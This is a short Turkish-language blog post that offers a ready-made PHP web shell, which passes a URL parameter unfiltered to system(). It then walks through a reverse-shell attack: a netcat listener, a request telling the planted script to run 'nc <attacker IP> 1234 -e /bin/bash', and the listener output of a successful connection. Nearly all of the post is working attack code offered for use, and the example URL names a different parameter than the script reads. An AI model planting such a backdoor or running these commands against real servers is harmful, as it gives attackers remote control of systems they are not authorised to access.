.

Posts Tagged “hazır Kotlar”

Php Scripts And Shell Commands yani php script üzerinden shell komut çalıştırma
ŞU ŞEKİLDE BİR SAYFA KODUMUZ VAR DİYELİM

if((!isset($_GET['c'])) || ($_GET['c']==""))
{
echo "Missing parameter.";
exit;
}

if(get_magic_quotes_gpc())
$cmd=stripslashes($_GET['c']);
else
$cmd=$_GET['c'];

system($cmd);
?>

pcnizden netcatın kurulu olduğunu varsayarak
CODE
nc -lvvp 1234
diyerek 1234 portundan servere netcat yardımıyla bağlanacaz

pcmizde yukarıdaki komutu giridkten sonra
sitedeki script üzerinden

cmd.php?cmd=nc%20bizimipadresimiz%201234%20-e%20/bin/bash
diyerek servere bağlantı sağlayacaz başarılıysak şoyle bir sonuç alacaz:

nc -lvvp 1234
listening on [any] 1234 …
192.168.1.111: inverse host lookup failed: Unknown host
connect to [siteipi] from (UNKNOWN) [bizimip] 4264

Comments Yorum Yok »